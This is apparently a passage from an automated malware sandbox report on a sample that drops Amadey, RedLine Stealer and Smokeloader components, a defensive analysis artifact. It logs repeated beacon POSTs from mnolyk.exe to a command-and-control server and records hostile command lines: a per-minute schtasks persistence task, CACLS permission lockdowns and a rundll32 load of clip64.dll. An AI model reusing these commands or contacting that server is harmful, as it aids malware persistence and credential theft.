                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:21.758744001 CET | 531 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      93 | 192.168.2.7 | 49818 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:21.931466103 CET | 531 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 6, 2023 18:36:21.996027946 CET | kBytes transferred: 532 | Direction: IN | Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 94 | Source IP: 192.168.2.7 | Source Port: 49819 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 6, 2023 18:36:22.168381929 CET | kBytes transferred: 532 | Direction: OUT | Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 6, 2023 18:36:22.234762907 CET | kBytes transferred: 533 | Direction: IN | Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 95 | Source IP: 192.168.2.7 | Source Port: 49820 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 6, 2023 18:36:22.420697927 CET | kBytes transferred: 533 | Direction: OUT | Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 6, 2023 18:36:22.485869884 CET | kBytes transferred: 534 | Direction: IN | Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 96 | Source IP: 192.168.2.7 | Source Port: 49821 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 6, 2023 18:36:22.668124914 CET | kBytes transferred: 534 | Direction: OUT | Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 6, 2023 18:36:22.732945919 CET | kBytes transferred: 535 | Direction: IN | Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 97 | Source IP: 192.168.2.7 | Source Port: 49822 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 6, 2023 18:36:22.933331966 CET | kBytes transferred: 535 | Direction: OUT | Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 6, 2023 18:36:22.998328924 CET | kBytes transferred: 536 | Direction: IN | Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 98 | Source IP: 192.168.2.7 | Source Port: 49823 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 6, 2023 18:36:23.177068949 CET | kBytes transferred: 536 | Direction: OUT | Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 6, 2023 18:36:23.242027998 CET | kBytes transferred: 537 | Direction: IN | Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 99 | Source IP: 192.168.2.7 | Source Port: 49824 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 6, 2023 18:36:23.412568092 CET | kBytes transferred: 537 | Direction: OUT | Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 6, 2023 18:36:23.474493980 CET | kBytes transferred: 538 | Direction: IN | Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0



                                                                      Target ID:0
                                                                      Start time:18:34:45
                                                                      Start date:06/02/2023
                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\file.exe
                                                                      Imagebase:0xa30000
                                                                      File size:587776 bytes
                                                                      MD5 hash:3AC20281C213C418608FCEA6D744AE8F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.249730772.00000000049A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      Target ID:1
                                                                      Start time:18:34:45
                                                                      Start date:06/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\brJg.exe
                                                                      Imagebase:0xf80000
                                                                      File size:395776 bytes
                                                                      MD5 hash:E61222B4D82A6007A553851456BCC651
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 49%, ReversingLabs
                                                                      Reputation:low

                                                                      Target ID:2
                                                                      Start time:18:34:46
                                                                      Start date:06/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\arJf.exe
                                                                      Imagebase:0x400000
                                                                      File size:371712 bytes
                                                                      MD5 hash:01BC3DF99AB67BABCDC1577241E3EE87
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: ditekSHen
                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.363155584.0000000000667000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.362707528.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.362707528.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000003.336400821.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000003.336400821.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 28%, ReversingLabs
                                                                      Reputation:low

                                                                      Target ID:3
                                                                      Start time:18:34:54
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                      Imagebase:0x7ff619610000
                                                                      File size:69632 bytes
                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Target ID:5
                                                                      Start time:18:35:03
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
                                                                      Imagebase:0x7ff619610000
                                                                      File size:69632 bytes
                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Target ID:13
                                                                      Start time:18:35:41
                                                                      Start date:06/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\nika.exe
                                                                      Imagebase:0x140000
                                                                      File size:11264 bytes
                                                                      MD5 hash:7E93BACBBC33E6652E147E7FE07572A0
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 82%, ReversingLabs
                                                                      Reputation:moderate

                                                                      Target ID:14
                                                                      Start time:18:35:53
                                                                      Start date:06/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                      Imagebase:0x10a0000
                                                                      File size:241664 bytes
                                                                      MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000E.00000000.394346269.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 81%, ReversingLabs
                                                                      Reputation:moderate

                                                                      Target ID:15
                                                                      Start time:18:35:53
                                                                      Start date:06/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                                                                      Imagebase:0x70000
                                                                      File size:241664 bytes
                                                                      MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000F.00000002.774984109.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000F.00000000.395382320.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000F.00000002.775467476.0000000001189000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 81%, ReversingLabs
                                                                      Reputation:moderate

                                                                      Target ID:16
                                                                      Start time:18:35:54
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                                                                      Imagebase:0xf80000
                                                                      File size:185856 bytes
                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Target ID:17
                                                                      Start time:18:35:54
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6edaf0000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:18
                                                                      Start time:18:35:54
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                                                                      Imagebase:0xa60000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:19
                                                                      Start time:18:35:54
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6edaf0000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:20
                                                                      Start time:18:35:54
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                      Imagebase:0xa60000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:21
                                                                      Start time:18:35:54
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\SysWOW64\cacls.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:CACLS "mnolyk.exe" /P "user:N"
                                                                      Imagebase:0x1280000
                                                                      File size:27648 bytes
                                                                      MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:22
                                                                      Start time:18:35:54
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\SysWOW64\cacls.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:CACLS "mnolyk.exe" /P "user:R" /E
                                                                      Imagebase:0x1280000
                                                                      File size:27648 bytes
                                                                      MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:23
                                                                      Start time:18:35:55
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                      Imagebase:0xa60000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:24
                                                                      Start time:18:35:55
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\SysWOW64\cacls.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:CACLS "..\4b9a106e76" /P "user:N"
                                                                      Imagebase:0x1280000
                                                                      File size:27648 bytes
                                                                      MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:25
                                                                      Start time:18:35:55
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\SysWOW64\cacls.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:CACLS "..\4b9a106e76" /P "user:R" /E
                                                                      Imagebase:0x1280000
                                                                      File size:27648 bytes
                                                                      MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:26
                                                                      Start time:18:35:56
                                                                      Start date:06/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Imagebase:0x70000
                                                                      File size:241664 bytes
                                                                      MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000001A.00000000.401919368.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000001A.00000002.404038192.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security

                                                                      Target ID:27
                                                                      Start time:18:35:56
                                                                      Start date:06/02/2023
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                                                                      Imagebase:0x990000
                                                                      File size:61952 bytes
                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Target ID:28
                                                                      Start time:18:36:01
                                                                      Start date:06/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Imagebase:0x70000
                                                                      File size:241664 bytes
                                                                      MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000001C.00000002.412655905.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000001C.00000000.412434202.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security

                                                                      Target ID:31
                                                                      Start time:18:37:00
                                                                      Start date:06/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Imagebase:0x70000
                                                                      File size:241664 bytes
                                                                      MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000001F.00000000.538870814.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000001F.00000002.539099474.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security

                                                                      Target ID:33
                                                                      Start time:18:38:00
                                                                      Start date:06/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Wow64 process (32bit):true
